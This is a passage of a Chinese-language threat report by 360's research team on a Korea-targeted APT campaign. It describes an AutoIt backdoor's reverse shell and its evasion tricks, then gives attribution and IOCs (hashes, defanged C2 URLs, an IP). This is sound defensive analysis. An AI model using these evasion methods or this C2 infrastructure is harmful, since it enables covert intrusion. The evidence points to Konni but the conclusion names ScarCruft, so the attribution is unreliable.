15px;">使用ShellExecute运行指定文件</span></span></p></td></tr></tbody></table><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.623121387283237" data-type="png" data-w="865" data-imgfileid="100024134" src="https://wechat2rss.xlab.app/img-proxy/?k=1d80c055&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twY3qlAGLppzrod8ibkymrvhdgXK6evJ33RWddBM62AzW0YibLJibSrLTnKg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">其中反向Shell实现机制是：通过_NAMEDPIPES_CREATEPIPE创建匿名管道重定向标准I/O流，调用CreateProcessA隐藏启动cmd.exe 进程并绑定管道，建立双向数据传输通道——持续读取子进程输出管道（READCHILDOUTPUT）经Socket上传至C2服务器，同时将接收的C2指令写入输入管道（WRITEREMOTESHELL）实现交互式控制，整个过程采用异步通信规避行为检测。其他指令（如文件传输、指令执行等）具体技术细节此处从略。</span></span></p><p><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.3283378746594006" data-type="png" data-w="734" data-imgfileid="100024135" src="https://wechat2rss.xlab.app/img-proxy/?k=3bed6084&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twY9rHplfkU0U3EPAoTT4uPIVCJ4ETQBIPHicq6077ibHS0RFd51bNTvwRQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-bottom: 24px;margin-top: 24px;"><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3.3）逃避与混淆技术</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">内联库文件</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">为避免依赖标准库并干扰分析，作者未使用AutoIt的常规<a class="wx_topic_link" topic-id="mk6jt3p3-rnijbf" style="color: #576B95 !important;" data-topic="1">#include指令</a>，而是将所有必需的UDF（如WinAPI、Security、NamedPipes等）的源代码直接嵌入脚本中。这一策略显著增加了脚本体积（从几十行扩展至近12000行），迫使分析人员需要耗费更多时间梳理冗余代码以定位核心功能模块。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">直接API调用</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">为实现更底层的操作并规避简单行为检测，脚本通过DllCall直接调用系统DLL（如kernel32.dll、user32.dll、ws2_32.dll）中的原生函数，而非依赖AutoIt封装的高级API。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-weight: bold;">原始套接字</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">脚本未采用AutoIt内置的TCPConnect等网络函数，而是通过手动调用Winsock API（如WSASocket、connect）实现套接字通信。这种设计可能旨在精确控制连接参数（如KeepAlive超时）或绕过针对脚本语言网络行为的特定监控机制，进一步隐蔽恶意流量特征。</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 三、归属研判 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">经分析，本次攻击活动中使用的恶意代码及C2基础设施与Konni组织历史攻击样本存在显著关联，具体体现在以下方面：</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">1. 本次攻击Konni组织仍采用LNK文件作为初始入口，诱骗用户点击后下载加密的后续载荷及诱饵文档，只是本次样本对LNK样本执行命令进行了加密处理，增加分析难度。此外，样本后续会通过AutoIt3.exe加载恶意AU3脚本，整体攻击流程与历史样本高度一致。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">2. 样本运行后创建的互斥体（Global\ED74CC72-AA6C-B091-B820-631489DA5F3B）在命名风格和结构上，与此前Konni组织样本中的互斥体（如Global\RT3AN7C9QS-7UYE-9K6G-A8F1-HY8IT3CNMEQP）高度相似。同时，计划任务的创建逻辑和代码实现也呈现一致性。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">3. 本次攻击活动在C2通信环节呈现与Konni组织高度关联的技术特征：攻击样本采用固定格式的URL（https[:]//techcross-wne[</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span></span><span leaf="">]com/include/plugin/snoopy/board/register.php?id={hostname}&amp;sn={ 请求数}）获取命令，其参数结构（id={hostname}标识受害主机，sn={请求数}作为序列计数器）与该组织历史攻击中使用的URL设计范式相似；同时，攻击者延续了Konni组织惯用的失陷站点托管策略，通过入侵韩国技术类网站techcross-wne[</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">.</span></span></span><span leaf="">]com伪装恶意流量，将载荷隐藏在/include/plugin/snoopy/board/路径下模拟正常插件目录，这种结合动态参数模板与可信域名滥用的手法，既强化了攻击归因依据，也凸显该组织在规避检测方面的成熟度。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">结合攻击目标（针对韩国地区）及上述技术特征，本次攻击活动可明确归属于</span><span leaf="">APT-C-28（ScarCruft）</span><span leaf="">组织，符合其长期攻击策略和工具链特点。</span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph" data-pm-slice="3 6 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></span></p></div></div><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;"><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">MD5</span></span></strong></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">4692034cd157c417c3868b5033d0e0d7</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">ca1237bd33f61f77990d76a3df130ef5</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">e4e7351cf3fc80e6f65c2226d1cafdb2</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;letter-spacing: 0.578px;text-indent: 37.3333px;color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">f9945ddbfcb05ee49ba21d49e8087a18</span></span></p><p style="margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">C&amp;C </span></span></strong></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">https[:]//techcross-wne[.]com/include/plugin/snoopy/board/register.php</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">https[:]//techcross-wne[.]com/include/plugin/snoopy/board/libs/mrd.dat</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0em;margin-bottom: 8px;line-height: 1.6em;margin-top: 8px;"><span style="color: rgb(0, 0, 0);font-size: 15px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">65.21.182[.]178:443</span></span></p></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="6 7 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type 